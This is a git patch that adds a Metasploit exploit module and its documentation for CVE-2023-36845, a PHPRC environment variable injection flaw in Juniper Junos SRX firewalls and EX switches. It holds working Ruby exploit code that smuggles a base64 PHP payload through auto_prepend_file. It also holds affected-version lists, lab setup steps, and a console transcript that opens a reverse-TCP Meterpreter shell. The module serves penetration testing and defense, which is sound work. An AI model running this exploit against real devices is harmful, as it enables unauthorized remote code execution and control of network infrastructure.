From da8c020d14bfc6c4e6f3ab9347532b46686faa26 Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Wed, 20 Sep 2023 16:47:05 -0400 Subject: [PATCH] Junos OS SRX and EX PHPRC Manipulation RCE --- .../http/junos_phprc_auto_prepend_file.md | 137 ++++++++++++++++++ .../http/junos_phprc_auto_prepend_file.rb | 85 +++++++++++ 2 files changed, 222 insertions(+) create mode 100644 documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md create mode 100644 modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb diff --git a/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md b/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md new file mode 100644 index 000000000000..8c1532626614 --- /dev/null +++ b/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md @@ -0,0 +1,137 @@ +## Vulnerable Application + +This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls +and EX switches. + +Juniper Networks Junos OS affected SRX Series: + +- All versions prior to 20.4R3-S8. +- 21.1 version 21.1R1 and later versions. +- 21.2 versions prior to 21.2R3-S6. +- 21.3 versions prior to 21.3R3-S5. +- 21.4 versions prior to 21.4R3-S5. +- 22.1 versions prior to 22.1R3-S3. +- 22.2 versions prior to 22.2R3-S2. +- 22.3 versions prior to 22.3R2-S2, 22.3R3. +- 22.4 versions prior to 22.4R2-S1, 22.4R3. + +Juniper Networks Junos OS affected EX Series: + +- All versions prior to 20.4R3-S8. +- 21.1 version 21.1R1 and later versions. +- 21.2 versions prior to 21.2R3-S6. +- 21.3 versions prior to 21.3R3-S5. +- 21.4 versions prior to 21.4R3-S4. +- 22.1 versions prior to 22.1R3-S3. +- 22.2 versions prior to 22.2R3-S1. +- 22.3 versions prior to 22.3R2-S2, 22.3R3. +- 22.4 versions prior to 22.4R2-S1, 22.4R3. + +### Description + +The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin +by opening `/dev/fd/0`. The exploit also makes use of two useful PHP features. The first being +`auto_prepend_file` which causes the provided file to be added using the `require` function. The second PHP +function is `allow_url_include` which allows the use of URL-aware `fopen` wrappers. By enabling +`allow_url_include`, the exploit can use any protocol wrapper with `auto_prepend_file`. The module then uses +`data://` to provide a file inline which includes the base64 encoded PHP payload. + +### Setup + +1. Navigate to the following URL: https://www.juniper.net/us/en/dm/download-next-gen-vsrx-firewall-trial.html +1. Setup an account and download the free trail of: `junos-vsrx3-x86-64-20.2R1.10.scsi.ova` +1. Boot +1. Log in as `root` / no password +1. Run `cli` +1. Run `configure` +1. Set password: `set system root-authentication plain-text-password` +1. Set hostname: `set system host-name (host-name)` +1. Set up the management interface: `set interfaces fxp0 unit 0 family inet dhcp-client` +1. Set up the traffic interfaces: `set interfaces ge-0/0/0 unit 0 family inet dhcp-client` +1. Set up security zones: `set security zones security-zone trust interfaces ge-0/0/0.0` +1. Validate the config: `commit check` + - If you typo'd something, you can `rollback` here and try again +1. Commit: `commit` +1. Exit config, then exit CLI: `exit` then `exit` +1. Reboot: `reboot` +1. Log in with your new account +1. Run `cli` again +1.Get the ip address with `show interfaces terse | match fxp` + +## Verification Steps + +1. Start msfconsole +1. Do: `use freebsd/http/junos_phprc_auto_prepend_file` +1. Set the `RHOST`, `LHOST` +1. Run the module +1. Receive a Meterpreter session as the `nobody` user. + +## Scenarios + +### PHP Meterpreter junos-vsrx3-x86-64-20.2R1.10.scsi.ova + +``` +msf6> use freebsd/http/junos_phprc_auto_prepend_file +msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > options + +Module options (exploit/freebsd/http/junos_phprc_auto_prepend_file): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 192.168.0.247 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 80 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + URIPATH no The URI to use for this exploit (default is random) + VHOST no HTTP server virtual host + + + When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. + SRVPORT 8080 yes The local port to listen on. + + +Payload options (php/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 192.168.0.77 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Junos OS SRX Firewall / EX Switch + + + +View the full module info with the info, or info -d command. + +msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set rhosts 192.168.0.247 +rhosts => 192.168.0.247 +msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set lhost 192.168.0.77 +lhost => 192.168.0.77 +msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run + +[*] Started reverse TCP handler on 192.168.0.77:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable. +[*] Sending stage (39927 bytes) to 192.168.0.247 +[*] Meterpreter session 4 opened (192.168.0.77:4444 -> 192.168.0.247:58995) at 2023-09-20 16:27:04 -0400 + +meterpreter > getuid +Server username: nobody +meterpreter > sysinfoi +[-] Unknown command: sysinfoi +meterpreter > sysinfo +Computer : JUNOS +OS : FreeBSD JUNOS JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun 7 23:59:18 PDT 2020 builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/ +Meterpreter : php/freebsd +meterpreter > +``` diff --git a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb new file mode 100644 index 000000000000..d68284285e18 --- /dev/null +++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb @@ -0,0 +1,85 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Junos OS PHPRC Environment Variable Manipulation RCE', + 'Description' => %q{ + This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls + and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin + by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being + 'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP + function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling + allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses + data:// to provide a file inline which includes the base64 encoded PHP payload. + }, + 'Author' => [ + 'Jacob Baines', # Analysis + 'jheysel-r7', # Msf module + 'Ron Bowes' # Target setup instructions + ], + 'References' => [ + [ 'URL', 'https://vulncheck.com/blog/juniper-cve-2023-36845'], + [ 'URL', 'https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US'], + [ 'CVE', '2023-36845'] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'php', + 'Privileged' => false, + 'Arch' => ARCH_PHP, + 'Targets' => [ + ['Junos OS SRX Firewall / EX Switch', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2023-08-17', + 'Notes' => { + 'Stability' => [ CRASH_SAFE, ], + 'SideEffects' => [ ], + 'Reliability' => [ REPEATABLE_SESSION, ] + } + ) + ) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, '?LD_PRELOAD=/tmp/ld'), + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded' + ) + + return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?('Cannot open "/tmp/ld"') + + CheckCode::Safe('Environment variable manipulation failed indicating this target is not vulnerable.') + end + + def execute_command(cmd, _opts = {}) + post_data = "allow_url_include=1\n" + post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(cmd)}\"" + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, '?PHPRC=/dev/fd/0'), + 'method' => 'POST', + 'data' => post_data.to_s, + 'ctype' => 'application/x-www-form-urlencoded' + ) + + print_error('The exploitation attempt returned a response which indicates exploitation was unsuccessful.') if res + end + + def exploit + execute_command(payload.encoded) + end +end